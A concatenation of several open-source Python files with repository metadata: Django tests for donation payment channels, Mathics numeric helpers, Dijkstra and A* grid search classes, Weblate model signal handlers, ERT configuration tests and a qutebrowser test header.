campaign__name="Foo campaign",
user=profile,
money_account=self.bank_account,
event=self.event,
)
self.assertEqual(
donor_payment_channel.no_upgrade,
False,
)
def test_not_regular_for_one_year(self):
"""Test DonorPaymentChannel that is not regular for at leas one year"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
regular_payments="regular",
user=profile,
money_account=self.bank_account,
event=self.event,
)
self.assertEqual(
donor_payment_channel.no_upgrade,
False,
)
def test_no_last_year_payments(self):
"""Test DonorPaymentChannel that has zero payments from last year"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
regular_payments="regular",
payment_set=[
mommy.make(
"Payment", date=datetime.date(year=2010, month=4, day=1)
),
],
user=profile,
money_account=self.bank_account,
event=self.event,
)
donor_payment_channel.save()
self.assertEqual(
donor_payment_channel.no_upgrade,
False,
)
def test_missing_payments(self):
"""Test DonorPaymentChannel that has different amount on payments before one year"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
regular_payments="regular",
payment_set=[
mommy.make(
"Payment",
date=datetime.date(year=2010, month=4, day=1),
amount=100,
),
mommy.make(
"Payment",
date=datetime.date(year=2009, month=3, day=1),
amount=200,
),
],
user=profile,
money_account=self.bank_account,
event=self.event,
)
donor_payment_channel.save()
self.assertEqual(
donor_payment_channel.no_upgrade,
False,
)
def test_regular(self):
"""Test DonorPaymentChannel that has regular payments"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
regular_payments="regular",
payment_set=[
mommy.make(
"Payment",
date=datetime.date(year=2010, month=4, day=1),
amount=100,
),
mommy.make(
"Payment",
date=datetime.date(year=2009, month=3, day=1),
amount=100,
),
],
user=profile,
money_account=self.bank_account,
event=self.event,
)
donor_payment_channel.save()
self.assertEqual(
donor_payment_channel.no_upgrade,
True,
)
@freeze_time("2016-6-1")
class TestExtraMoney(TestCase):
"""Test TerminalCondition.extra_money()"""
def setUp(self):
administrative_unit = mommy.make(
"aklub.AdministrativeUnit",
name="test",
)
self.bank_account = mommy.make(
"aklub.BankAccount",
administrative_unit=administrative_unit,
)
self.event = mommy.make(
"events.event",
administrative_units=[
administrative_unit,
],
)
self.donor_payment_channel = Recipe(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
user__first_name="Foo user",
money_account=self.bank_account,
event=self.event,
)
def test_extra_payment(self):
"""Test DonorPaymentChannel with extra payment"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_amount=100,
regular_payments="regular",
regular_frequency="monthly",
payment_set=[
mommy.make(
"Payment",
date=datetime.date(year=2016, month=5, day=5),
amount=250,
),
],
user=profile,
money_account=self.bank_account,
)
donor_payment_channel.save()
self.assertEqual(donor_payment_channel.extra_money, 150)
self.assertEqual(donor_payment_channel.extra_payments(), "150 Kč")
def test_payment_too_old(self):
"""Test that if the payment is older than 27 days, it is not counted in"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_amount=100,
regular_payments="regular",
regular_frequency="monthly",
payment_set=[
mommy.make(
"Payment",
date=datetime.date(year=2016, month=5, day=4),
amount=250,
),
],
user=profile,
money_account=self.bank_account,
)
donor_payment_channel.save()
self.assertEqual(donor_payment_channel.extra_money, None)
self.assertEqual(donor_payment_channel.extra_payments(), ICON_FALSE)
def test_no_extra_payment(self):
"""Test DonorPaymentChannel with extra payment"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_amount=100,
regular_payments="regular",
regular_frequency="monthly",
user=profile,
money_account=self.bank_account,
)
donor_payment_channel.save()
self.assertEqual(donor_payment_channel.extra_money, None)
self.assertEqual(donor_payment_channel.extra_payments(), ICON_FALSE)
def test_no_frequency(self):
"""Test DonorPaymentChannel with no regular frequency"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_amount=100,
regular_payments="regular",
regular_frequency=None,
user=profile,
money_account=self.bank_account,
)
donor_payment_channel.save()
self.assertEqual(donor_payment_channel.extra_money, None)
self.assertEqual(donor_payment_channel.extra_payments(), ICON_FALSE)
def test_not_regular(self):
"""Test when DonorPaymentChannel is not regular"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_payments="onetime",
user=profile,
money_account=self.bank_account,
)
self.assertEqual(donor_payment_channel.extra_money, None)
self.assertEqual(donor_payment_channel.extra_payments(), ICON_FALSE)
class TestNameFunctions(TestCase):
    """Test DonorPaymentChannel.person_name(), DonorPaymentChannel.__str__()"""
    def setUp(self):
        # user profile with a primary e-mail and an academic title
        user_profile = mommy.make(
            "aklub.UserProfile",
            first_name="Test",
            last_name="User 1",
            email="test@test.com",
            title_before="Ing.",
        )
        mommy.make(
            "aklub.ProfileEmail",
            email="test@test.com",
            user=user_profile,
            is_primary=True,
        )
        # company profile with a primary company contact
        company_profile = mommy.make(
            "aklub.CompanyProfile",
            username="test",
            name="Company",
            email="test@test.com",
        )
        mommy.make(
            "aklub.CompanyContact",
            email="test@test.com",
            company=company_profile,
            is_primary=True,
        )
        administrative_unit = mommy.make(
            "aklub.AdministrativeUnit",
            name="test",
        )
        bank_account = mommy.make(
            "aklub.BankAccount",
            administrative_unit=administrative_unit,
        )
        self.donor_payment_channel_user_profile = mommy.make(
            "aklub.DonorPaymentChannel",
            event__name="Foo campaign",
            user=user_profile,
            VS=1234,
            money_account=bank_account,
        )
        self.donor_payment_channel_company_profile = mommy.make(
            "aklub.DonorPaymentChannel",
            event__name="Foo campaign",
            user=company_profile,
            VS=5678,
            money_account=bank_account,
        )
    def test_user_person_name(self):
        # person_name(): title first, then last name before first name;
        # companies use their plain name
        self.assertEqual(
            self.donor_payment_channel_user_profile.person_name(), "Ing. User 1 Test"
        )
        self.assertEqual(
            self.donor_payment_channel_company_profile.person_name(), "Company"
        )
    def test_str(self):
        # the string representation is derived from the variable symbol (VS)
        self.assertEqual(
            self.donor_payment_channel_user_profile.__str__(), "Payment channel: 1234"
        )
        self.assertEqual(
            self.donor_payment_channel_company_profile.__str__(),
            "Payment channel: 5678",
        )
@freeze_time("2010-5-1")
class TestDenormalizedFields(TestCase):
"""
testing if denormalized fields of donor_payment_channel are changed,
which are made by django-computedfields library
"""
def setUp(self):
unit = mommy.make("aklub.AdministrativeUnit", name="test")
self.money_acc = mommy.make(
"aklub.BankAccount", administrative_unit=unit, bank_account_number="12345"
)
self.event = mommy.make(
"events.event",
name="name",
administrative_units=[
unit,
],
)
self.dpch = mommy.make(
"aklub.DonorPaymentChannel",
id=10,
money_account=self.money_acc,
regular_frequency="monthly",
regular_amount=100,
expected_date_of_first_payment=datetime.date(year=2022, month=1, day=19),
event=self.event,
)
mommy.make(
"aklub.Payment",
user_donor_payment_channel=self.dpch,
recipient_account=self.money_acc,
amount=100,
date=datetime.date(year=2022, month=1, day=19),
)
def test_payment_changed(self):
payment = self.dpch.payment_set.first()
payment.amount = 500
payment.save()
dpch = DonorPaymentChannel.objects.get(id=10)
self.assertEqual(dpch.number_of_payments, 1)
self.assertEqual(dpch.last_payment, payment)
self.assertEqual(dpch.expected_regular_payment_date, datetime.date(2022, 2, 19))
self.assertEqual(dpch.payment_total, 500)
self.assertEqual(dpch.extra_money, 400)
self.assertEqual(dpch.no_upgrade, False)
def test_payment_added(self):
payment = mommy.make(
"aklub.Payment",
user_donor_payment_channel=self.dpch,
recipient_account=self.money_acc,
amount=300,
date=datetime.date(year=2022, month=2, day=19),
)
payment.user_donor_payment_channel = self.dpch
payment.save()
dpch = DonorPaymentChannel.objects.get(id=10)
self.assertEqual(dpch.number_of_payments, 2)
self.assertEqual(dpch.last_payment, payment)
self.assertEqual(dpch.expected_regular_payment_date, datetime.date(2022, 3, 22))
self.assertEqual(dpch.payment_total, 400)
self.assertEqual(dpch.extra_money, 300)
self.assertEqual(dpch.no_upgrade, False)
class TestModelMethods(TestCase):
    """Tests for DonorPaymentChannel.regular_payments_delay()"""
    def setUp(self):
        self.user = mommy.make("aklub.UserProfile", sex="male")
        unit = mommy.make("aklub.AdministrativeUnit", name="test1")
        self.bank_acc = mommy.make(
            "aklub.BankAccount", bank_account_number="123", administrative_unit=unit
        )
        self.event = mommy.make("Event")
    @freeze_time("2017-5-1")
    def test_regular_payments_delay(self):
        self.dpch = mommy.make(
            "aklub.DonorPaymentChannel",
            user=self.user,
            event=self.event,
            money_account=self.bank_acc,
            regular_payments="onetime",
        )
        # fails, because cant be calculated => return None
        self.assertEqual(self.dpch.regular_payments_delay(), None)
        # additional info which is needed for calculating
        self.dpch.regular_payments = "regular"
        self.dpch.regular_frequency = "monthly"
        self.dpch.save()
        self.payment = mommy.make(
            "aklub.Payment",
            amount=350,
            date="2017-03-01",
            type="regular",
            user_donor_payment_channel=self.dpch,
        )
        self.dpch.refresh_from_db()
        # 20 days delay, because we have 10 days tolerance
        self.assertEqual(self.dpch.regular_payments_delay(), datetime.timedelta(20))
        self.payment = mommy.make(
            "aklub.Payment",
            amount=350,
            date="2017-04-29",
            type="regular",
            user_donor_payment_channel=self.dpch,
        )
        self.dpch.refresh_from_db()
        # paid 3 days ago so in time
        # NOTE(review): returns int 0 here but a timedelta above — verify
        # the mixed return type of regular_payments_delay() is intended
        self.assertEqual(self.dpch.regular_payments_delay(), 0)
|
auto-mat/klub
|
apps/aklub/tests/models/test_donor_payment_channel.py
|
Python
|
gpl-3.0
| 18,112
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
import sympy
import mpmath
from math import log
from six.moves import range
from mathics.core.util import unicode_superscript
def get_type(value):
    """Classify a number: 'z' integer, 'q' rational, 'f' float,
    'c' complex, None for anything else."""
    # sympy.Integer is a subclass of sympy.Rational, so check it first
    if isinstance(value, sympy.Integer):
        return 'z'
    if isinstance(value, sympy.Rational):
        return 'q'
    if isinstance(value, (sympy.Float, mpmath.mpf)):
        return 'f'
    if isinstance(value, mpmath.mpc):
        return 'c'
    if isinstance(value, sympy.Expr) and value.is_number and not value.is_real:
        return 'c'
    return None
def same(v1, v2):
    """Return whether both values share a type code and compare equal."""
    if get_type(v1) != get_type(v2):
        return False
    return v1 == v2
def is_0(value):
    """Return whether value is the integer zero."""
    if get_type(value) != 'z':
        return False
    return value == 0
def sympy2mpmath(value, prec=None):
    """Convert a sympy number to mpmath at `prec` bits of precision.

    Returns None when the value is not numeric.
    """
    if prec is None:
        # fall back to the interpreter-wide machine precision
        from mathics.builtin.numeric import machine_precision
        prec = machine_precision
    evaluated = value.n(dps(prec))
    if evaluated.is_real:
        return mpmath.mpf(evaluated)
    if evaluated.is_number:
        return mpmath.mpc(*evaluated.as_real_imag())
    return None
class SpecialValueError(Exception):
    """Raised when a conversion hits a special value (e.g. ComplexInfinity).

    :ivar name: symbolic name of the special value.
    """
    def __init__(self, name):
        # pass the name to Exception so str(exc) is informative
        # (previously Exception.__init__ was never called and str() was empty)
        super(SpecialValueError, self).__init__(name)
        self.name = name
def mpmath2sympy(value, prec):
    """Convert an mpmath number to sympy at `prec` bits of precision.

    Raises SpecialValueError('ComplexInfinity') for infinite reals and
    returns None for non-mpmath input.
    """
    if isinstance(value, mpmath.mpc):
        digits = dps(prec)
        real = sympy.Float(str(value.real), digits)
        imag = sympy.Float(str(value.imag), digits)
        return real + sympy.I * imag
    if isinstance(value, mpmath.mpf):
        if str(value) in ('+inf', '-inf'):
            raise SpecialValueError('ComplexInfinity')
        return sympy.Float(str(value), dps(prec))
    return None
# conversion factor between binary and decimal precision
C = log(10, 2)  # ~ 3.3219280948873626


def dps(prec):
    """Convert binary precision (bits) to decimal digits."""
    bits = int(prec)
    return max(1, int(round(bits / C - 1)))


def prec(dps):
    """Convert decimal digits to binary precision (bits)."""
    digits = int(dps)
    return max(1, int(round((digits + 1) * C)))
def format_float(value, pretty=True, parenthesize_plus=False):
    """Format a float, rendering a base-10 exponent either with a pretty
    unicode superscript or as '*10^exp'."""
    mantissa, sep, exponent = str(value).partition('e')
    if not sep:
        # no exponent part at all
        return mantissa
    if pretty:
        return '%s\u00d710%s' % (format_float(mantissa),
                                 unicode_superscript(exponent))
    result = '%s*10^%s' % (format_float(mantissa), exponent)
    if parenthesize_plus:
        result = '(%s)' % result
    return result
def mul(x, y):
    """Binary multiplication helper (usable as a fold callable)."""
    product = x * y
    return product


def add(x, y):
    """Binary addition helper (usable as a fold callable)."""
    total = x + y
    return total
def min_prec(*args):
    """Return the smallest precision among the arguments.

    None precisions are ignored; returns None when no argument has one.
    """
    smallest = None
    for arg in args:
        candidate = arg.get_precision()
        if candidate is None:
            continue
        if smallest is None or candidate < smallest:
            smallest = candidate
    return smallest
def pickle_mp(value):
    """Serialize a numeric value as a (type-code, string) pair."""
    code = get_type(value)
    return (code, str(value))
def unpickle_mp(value):
    """Inverse of pickle_mp: rebuild a value from a (type-code, string) pair."""
    code, text = value
    constructors = {
        'z': sympy.Integer,
        'q': sympy.Rational,
        'f': sympy.Float,
    }
    if code in constructors:
        return constructors[code](text)
    # unknown code: hand the raw string back unchanged
    return text
# algorithm based on
# http://stackoverflow.com/questions/5110177/how-to-convert-floating-point-number-to-base-3-in-python # nopep8
def convert_base(x, base, precision=10):
sign = -1 if x < 0 else 1
x *= sign
length_of_int = 0 if x == 0 else int(log(x, base))
iexps = list(range(length_of_int, -1, -1))
import string
digits = string.digits + string.ascii_lowercase
if base > len(digits):
raise ValueError
def convert(x, base, exponents):
out = []
for e in exponents:
d = int(x // (base ** e))
x -= d * (base ** e)
out.append(digits[d])
if x == 0 and e < 0:
break
return out
int_part = convert(int(x), base, iexps)
if sign == -1:
int_part.insert(0, '-')
if (isinstance(x, float)):
fexps = list(range(-1, -int(precision + 1), -1))
real_part = convert(x - int(x), base, fexps)
return "%s.%s" % (''.join(int_part), ''.join(real_part))
else:
return ''.join(int_part)
def convert_int_to_digit_list(x, base):
    """Return the digits of abs(x) in the given base, most significant first."""
    if x == 0:
        return [0]
    x = abs(x)
    exponents = list(range(int(log(x, base)) + 1, -1, -1))
    out = []
    for e in exponents:
        d = int(x // (base ** e))
        x -= d * (base ** e)
        if out or d != 0:  # drop any leading zeroes
            out.append(d)
        if x == 0 and e < 0:
            break
    return out
|
bnjones/Mathics
|
mathics/core/numbers.py
|
Python
|
gpl-3.0
| 4,474
|
import numpy as np
class Search(object):
    """
    A base class for all searching algorithms on grid
    """
    def __init__(self, grid, start_point, final_point):
        # problem definition shared by all concrete search strategies
        self.grid = grid
        self.start_point = start_point
        self.final_point = final_point


class dijkstra(Search):
    """
    A specific class that applies dijkstra shortest path algorithm
    """
    def __init__(self, grid, start_point, final_point):
        Search.__init__(self, grid, start_point, final_point)

    def eval_cost(self):
        """
        This function evaluates the cost of the shortest path

        :return: The cost of the shortest path, or None when the goal is
            unreachable
        """
        if self.start_point == self.final_point:
            total_cost = 0
            return total_cost
        # open list entries are [cost, row, col]
        open_list = [np.append([0], self.start_point)]
        # closed_list doubles as obstacle/visited map (non-zero = blocked
        # or already expanded)
        closed_list = np.copy(self.grid.grid)
        while True:
            if len(open_list) == 0:
                print("There is no open path from the origin to the final destination")
                return None
            # sort descending by cost so pop() removes the cheapest node
            open_list = sorted(open_list, key=lambda row: row[0], reverse=True)
            element = open_list.pop()
            if (element[1] == self.final_point[0]) and (element[2] == self.final_point[1]):
                total_cost = element[0]
                print("Final point reached with cost {}".format(total_cost))
                print(closed_list)
                return total_cost
            # expand unvisited successors with uniform step cost grid.cost
            successors = self.grid.find_successors(element[1:])
            open_list += [[element[0] + self.grid.cost] + list(s) for s in successors if closed_list[s[0], s[1]] == 0]
            closed_list[element[1], element[2]] = 1


class Astar(Search):
    """A* search on a grid with unit step costs.

    :param heuristic: optional per-cell heuristic array; defaults to the
        Manhattan distance to ``final_point``.
    """
    def __init__(self, grid, start_point, final_point, heuristic=None):
        Search.__init__(self, grid, start_point, final_point)
        if heuristic is not None:
            self.heuristic = heuristic
        else:
            self.heuristic = self._default_heuristic()

    def eval_cost(self):
        """Evaluate the cost of the shortest path.

        :return: cost of the shortest path, or None when unreachable
        """
        if self.start_point == self.final_point:
            total_cost = 0
            return total_cost
        x = self.start_point[0]
        y = self.start_point[1]
        f = self.heuristic[x, y]
        open_list = [[f, x, y]]
        closed_list = np.copy(self.grid.grid)
        while True:
            if len(open_list) == 0:
                print("There is no open path from the origin to the final destination")
                return None
            # pop the node with the smallest f = g + h
            open_list = sorted(open_list, key=lambda row: row[0], reverse=True)
            element = open_list.pop()
            x = element[1]
            y = element[2]
            f = element[0]
            if (x == self.final_point[0]) and (y == self.final_point[1]):
                # strip the heuristic part to recover the pure path cost
                total_cost = f - self.heuristic[x, y]
                print("Final point reached with cost {}".format(total_cost))
                print(closed_list)
                return total_cost
            successors = self.grid.find_successors(element[1:])
            open_list += [[f + 1 + self.heuristic[s[0], s[1]] - self.heuristic[x, y], s[0], s[1]]
                          for s in successors if closed_list[s[0], s[1]] == 0]
            closed_list[element[1], element[2]] = 1

    def _default_heuristic(self):
        """Manhattan distance from every cell to the goal cell."""
        grid_shape = self.grid.grid.shape
        heuristic = np.zeros(grid_shape)
        for i in range(grid_shape[0]):
            for j in range(grid_shape[1]):
                # BUGFIX: the column term previously used final_point[0];
                # the j axis must compare against the goal's column.
                heuristic[i, j] = abs(self.final_point[0] - i) + abs(self.final_point[1] - j)
        return heuristic
|
ruleva1983/udacity-selfdrivingcar
|
term3/exercises/search_strategies/python/search.py
|
Python
|
gpl-3.0
| 3,546
|
#
# Copyright © 2012–2022 Michal Čihař <michal@cihar.com>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
import os
from django.db.models.signals import m2m_changed, post_delete, post_save
from django.dispatch import receiver
from weblate.trans.models._conf import WeblateConf
from weblate.trans.models.agreement import ContributorAgreement
from weblate.trans.models.alert import Alert
from weblate.trans.models.announcement import Announcement
from weblate.trans.models.change import Change
from weblate.trans.models.comment import Comment
from weblate.trans.models.component import Component
from weblate.trans.models.componentlist import AutoComponentList, ComponentList
from weblate.trans.models.label import Label
from weblate.trans.models.project import Project
from weblate.trans.models.projecttoken import ProjectToken
from weblate.trans.models.suggestion import Suggestion, Vote
from weblate.trans.models.translation import Translation
from weblate.trans.models.unit import Unit
from weblate.trans.models.variant import Variant
from weblate.trans.signals import user_pre_delete
from weblate.utils.decorators import disable_for_loaddata
from weblate.utils.files import remove_tree
__all__ = [
"Project",
"Component",
"Translation",
"Unit",
"Suggestion",
"Comment",
"Vote",
"Change",
"Announcement",
"ComponentList",
"WeblateConf",
"ContributorAgreement",
"Alert",
"Variant",
"Label",
"ProjectToken",
]
def delete_object_dir(instance):
    """Remove the object's on-disk directory if it exists."""
    path = instance.full_path
    if os.path.exists(path):
        remove_tree(path)
@receiver(post_delete, sender=Project)
def project_post_delete(sender, instance, **kwargs):
    """Handler to delete (sub)project directory on project deletion."""
    # drop cached statistics, then remove the on-disk data
    instance.stats.invalidate()
    delete_object_dir(instance)
@receiver(post_delete, sender=Component)
def component_post_delete(sender, instance, **kwargs):
    """Handler to delete (sub)project directory on component deletion."""
    # drop cached statistics
    instance.stats.invalidate()
    # linked components share another component's repository, so only
    # remove the directory for non-linked ones
    if instance.is_repo_link:
        return
    delete_object_dir(instance)
@receiver(m2m_changed, sender=Unit.labels.through)
@disable_for_loaddata
def change_labels(sender, instance, action, pk_set, **kwargs):
    """Update unit labels."""
    # only react to completed m2m mutations on source units; post_clear
    # carries no pk_set, all other actions need a non-empty one
    if action not in ("post_add", "post_remove", "post_clear"):
        return
    if action != "post_clear" and not pk_set:
        return
    if not instance.is_source:
        return
    if not instance.is_batch_update:
        instance.translation.component.invalidate_cache()
@receiver(user_pre_delete)
def user_commit_pending(sender, instance, **kwargs):
    """Commit pending changes for user on account removal."""
    # all changes authored by this user
    changes = Change.objects.last_changes(instance).filter(user=instance)
    # translations the user has touched
    translation_ids = changes.values_list("translation", flat=True).distinct()
    for translation in Translation.objects.filter(pk__in=translation_ids):
        # commit only where the user is the last content author
        try:
            last_author = translation.change_set.content()[0].author
        except IndexError:
            # no content changes in this translation
            continue
        if last_author == instance:
            translation.commit_pending("user delete", None)
@receiver(m2m_changed, sender=ComponentList.components.through)
@disable_for_loaddata
def change_componentlist(sender, instance, action, **kwargs):
    """Invalidate component list stats after a completed m2m change."""
    if action.startswith("post_"):
        instance.stats.invalidate()
@receiver(post_save, sender=AutoComponentList)
@disable_for_loaddata
def auto_componentlist(sender, instance, **kwargs):
    """Re-evaluate every component against a saved auto component list."""
    for existing in Component.objects.iterator():
        instance.check_match(existing)
@receiver(post_save, sender=Project)
@disable_for_loaddata
def auto_project_componentlist(sender, instance, **kwargs):
    """Apply auto component list rules to all components of a saved project."""
    for member in instance.component_set.iterator():
        auto_component_list(sender, member)
@receiver(post_save, sender=Component)
@disable_for_loaddata
def auto_component_list(sender, instance, **kwargs):
    """Match a saved component against every auto component list rule."""
    for rule in AutoComponentList.objects.iterator():
        rule.check_match(instance)
@receiver(post_delete, sender=Component)
@disable_for_loaddata
def post_delete_linked(sender, instance, **kwargs):
    """Refresh link alerts on the component this one linked to."""
    # when removing a project, the linked component might already be
    # deleted, in which case the lookup raises DoesNotExist
    try:
        linked = instance.linked_component
        if linked:
            linked.update_link_alerts(noupdate=True)
    except Component.DoesNotExist:
        pass
@receiver(post_save, sender=Comment)
@receiver(post_save, sender=Suggestion)
@receiver(post_delete, sender=Suggestion)
@disable_for_loaddata
def stats_invalidate(sender, instance, **kwargs):
    """Invalidate stats on new comment or suggestion."""
    # invalidate stats counts on the affected translation
    instance.unit.translation.invalidate_cache()
    # NOTE(review): the original comment spoke of *unit* cached
    # properties, yet these keys are popped from the comment/suggestion
    # instance itself — verify that this is the intended target
    for cached in ("all_comments", "suggestions"):
        instance.__dict__.pop(cached, None)
|
nijel/weblate
|
weblate/trans/models/__init__.py
|
Python
|
gpl-3.0
| 5,857
|
# Copyright (C) 2017 Equinor ASA, Norway.
#
# The file 'test_model_config.py' is part of ERT - Ensemble based Reservoir Tool.
#
# ERT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ERT is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html>
# for more details.
from ecl.util.test import TestAreaContext
from libres_utils import ResTest
from res.enkf import ConfigKeys, ModelConfig, ResConfig
from res.sched import HistorySourceEnum
class ModelConfigTest(ResTest):
    """Tests for ModelConfig as built by ResConfig from dicts and config files."""
    def setUp(self):
        # config providing both JOBNAME and ECLBASE
        self.config_both = {
            "INTERNALS": {
                "CONFIG_DIRECTORY": "simple_config",
            },
            "SIMULATION": {
                "QUEUE_SYSTEM": {
                    "JOBNAME": "JOBNAME%d",
                },
                "RUNPATH": "/tmp/simulations/run%d",
                "NUM_REALIZATIONS": 1,
                "JOB_SCRIPT": "script.sh",
                "ENSPATH": "Ensemble",
                "ECLBASE": "ECLBASE%d",
            },
        }
        # config providing only ECLBASE
        self.config_eclbase = {
            "INTERNALS": {
                "CONFIG_DIRECTORY": "simple_config",
            },
            "SIMULATION": {
                "RUNPATH": "/tmp/simulations/run%d",
                "NUM_REALIZATIONS": 1,
                "JOB_SCRIPT": "script.sh",
                "ENSPATH": "Ensemble",
                "ECLBASE": "ECLBASE%d",
            },
        }
        # config providing only JOBNAME
        self.config_jobname = {
            "INTERNALS": {
                "CONFIG_DIRECTORY": "simple_config",
            },
            "SIMULATION": {
                "QUEUE_SYSTEM": {
                    "JOBNAME": "JOBNAME%d",
                },
                "RUNPATH": "/tmp/simulations/run%d",
                "NUM_REALIZATIONS": 1,
                "JOB_SCRIPT": "script.sh",
                "ENSPATH": "Ensemble",
            },
        }
    def test_eclbase_and_jobname(self):
        # with both keys present, JOBNAME wins as the jobname format
        case_directory = self.createTestPath("local/simple_config")
        with TestAreaContext("test_eclbase_and_jobname") as work_area:
            work_area.copy_directory(case_directory)
            res_config = ResConfig(config=self.config_both)
            model_config = res_config.model_config
            ecl_config = res_config.ecl_config
            self.assertTrue(ecl_config.active())
            self.assertEqual("JOBNAME%d", model_config.getJobnameFormat())
    def test_eclbase(self):
        # with only ECLBASE, it doubles as the jobname format
        case_directory = self.createTestPath("local/simple_config")
        with TestAreaContext("test_eclbase") as work_area:
            work_area.copy_directory(case_directory)
            res_config = ResConfig(config=self.config_eclbase)
            model_config = res_config.model_config
            ecl_config = res_config.ecl_config
            self.assertTrue(ecl_config.active())
            self.assertEqual("ECLBASE%d", model_config.getJobnameFormat())
    def test_jobname(self):
        # with only JOBNAME, eclipse config stays inactive
        case_directory = self.createTestPath("local/simple_config")
        with TestAreaContext("test_jobname") as work_area:
            work_area.copy_directory(case_directory)
            res_config = ResConfig(config=self.config_jobname)
            model_config = res_config.model_config
            ecl_config = res_config.ecl_config
            self.assertFalse(ecl_config.active())
            self.assertEqual("JOBNAME%d", model_config.getJobnameFormat())
    def test_model_config_dict_constructor(self):
        # a ModelConfig built from an equivalent dict must equal the one
        # parsed from the .ert user config file
        case_directory = self.createTestPath("local/configuration_tests")
        with TestAreaContext("test_constructor") as work_area:
            work_area.copy_directory(case_directory)
            res_config = ResConfig(
                user_config_file="configuration_tests/model_config.ert"
            )
            config_dict = {
                ConfigKeys.MAX_RESAMPLE: 1,
                ConfigKeys.JOBNAME: "model_config_test",
                ConfigKeys.RUNPATH: "/tmp/simulations/run%d",
                ConfigKeys.NUM_REALIZATIONS: 10,
                ConfigKeys.ENSPATH: "configuration_tests/Ensemble",
                ConfigKeys.TIME_MAP: "configuration_tests/input/refcase/time_map.txt",
                ConfigKeys.OBS_CONFIG: "configuration_tests/input/observations/observations.txt",
                ConfigKeys.DATAROOT: "configuration_tests/",
                ConfigKeys.HISTORY_SOURCE: HistorySourceEnum(1),
                ConfigKeys.GEN_KW_EXPORT_NAME: "parameter_test.json",
                ConfigKeys.FORWARD_MODEL: [
                    {
                        ConfigKeys.NAME: "COPY_FILE",
                        ConfigKeys.ARGLIST: "<FROM>=input/schedule.sch, <TO>=output/schedule_copy.sch",
                    },
                    {
                        ConfigKeys.NAME: "SNAKE_OIL_SIMULATOR",
                        ConfigKeys.ARGLIST: "",
                    },
                    {
                        ConfigKeys.NAME: "SNAKE_OIL_NPV",
                        ConfigKeys.ARGLIST: "",
                    },
                    {
                        ConfigKeys.NAME: "SNAKE_OIL_DIFF",
                        ConfigKeys.ARGLIST: "",
                    },
                ],
            }
            model_config = ModelConfig(
                data_root="",
                joblist=res_config.site_config.get_installed_jobs(),
                last_history_restart=res_config.ecl_config.getLastHistoryRestart(),
                refcase=res_config.ecl_config.getRefcase(),
                config_dict=config_dict,
            )
            self.assertEqual(model_config, res_config.model_config)
    def test_schedule_file_as_history_is_disallowed(self):
        case_directory = self.createTestPath("local/configuration_tests")
        with TestAreaContext("test_constructor") as work_area:
            work_area.copy_directory(case_directory)
            with self.assertRaises(ValueError) as cm:
                ResConfig(
                    user_config_file="configuration_tests/sched_file_as_history_source.ert"
                )
            # Any assert should per the unittest documentation be outside the
            # scope of the assertRaises with-block.
            expected = "{} as {} is not supported".format(
                str(HistorySourceEnum.SCHEDULE), ConfigKeys.HISTORY_SOURCE
            )
            self.assertIn(expected, str(cm.exception))
|
joakim-hove/ert
|
tests/libres_tests/res/enkf/test_model_config.py
|
Python
|
gpl-3.0
| 6,704
|
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2017-2021 Ryan Roden-Corrent (rcorre) <ryan@rcorre.net>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Tests for CompletionModel."""
from unittest import mock
import hypothesis
from hypothesis import strategies
import pytest
from PyQt5.QtCore import QModelIndex
from qutebrowser.completion.models import completionmodel, listcategory
from qutebrowser.utils import qtutils
